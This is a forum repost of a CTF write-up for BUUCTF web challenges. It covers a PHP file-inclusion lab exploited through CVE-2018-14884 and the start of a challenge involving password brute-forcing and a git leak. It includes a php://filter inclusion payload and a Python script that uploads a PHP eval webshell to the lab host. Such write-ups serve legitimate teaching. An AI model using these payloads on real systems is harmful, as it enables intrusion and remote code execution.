BUUCTF-WEB(86-90)

铁佛  金牌会员 | 2024-6-17 19:52:53 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 882|帖子 882|积分 2646

[NPUCTF2020]ezinclude

参考:php7 segment fault特性(CVE-2018-14884) - Eddie_Murphy - 博客园 (cnblogs.com)
[BUUCTF题解][NPUCTF2020]ezinclude 1 - Article_kelp - 博客园 (cnblogs.com)
查看源码发现

然后抓包发现一个hash值

然后我直接传参数,让pass即是这一个Hash值
  1. ?pass=fa25e54758d5d5c1927781a6ede89f8a
复制代码

然后我们访问flflflflag.php,网页访问直接就是404,我们在burp访问一下

然后有一个文件包含,我们输入
  1. ?file=php://filter/read=convert.base64-encode/resource=index.php
复制代码

然后没发现啥,看到了过滤了一些东西,然后我们得想办法getshell
然后查了一下可以利用CVE-2018-14884
  1. 使用php://filter/string.strip_tags导致php崩溃清空堆栈重启,如果在同时上传了一个文件,那么这个tmp file就会一直留在tmp目录,知道文件名就可以getshell,因为/tmp/xxx,里面的xxx是随机的,需要我们获取才能利用
复制代码
发现他着实还有一个dir.php,后面用于我们获取文件名。

以下是师傅的脚本
  1. import requests
  2. from io import BytesIO #BytesIO实现了在内存中读写bytes
  3. payload = "<?php eval($_POST[cmd]);?>"
  4. data={'file': BytesIO(payload.encode())}
  5. url="http://03c49e5c-9594-4b26-8498-0eb1f8203cff.node5.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
  6. r=requests.post(url=url,files=data,allow_redirects=False)
复制代码
运行事后,我们再次看一下这个dir.php,发现了多了一个文件

然后蚁剑连接
  1. http://03c49e5c-9594-4b26-8498-0eb1f8203cff.node5.buuoj.cn:81/flflflflag.php?file=/tmp/phpFVc8V7
复制代码
连接上去也没有文件。
然后给脚本里面改一下,直接改成phpinfo,然后查看一下文件名,访问
  1. /flflflflag.php?file=/tmp/phpeEMvZk
复制代码

[网鼎杯 2018]Comment

参考:[BUUCTF题解][网鼎杯 2018]Comment - Article_kelp - 博客园 (cnblogs.com)
[网鼎杯 2018]Comment题解,超详细!_网鼎杯2018 comment-CSDN博客
[网鼎杯 2018]Comment(二次注入,git泄露,git恢复)_[网鼎杯 2018]comment 1-CSDN博客
随便发了一个批评

提示我们登录,密码是少了三位的,我们burp爆破一下,记得改一下位数

然后爆破出来就是zhangwei666

然后登陆进来没啥东西,然后扫描发现了git泄露


然后我们使用githacker<a href="https://github.com/WangYihang/GitHacker" target="_blank" rel="noopener">WangYihang/GitHacker:
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

铁佛

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表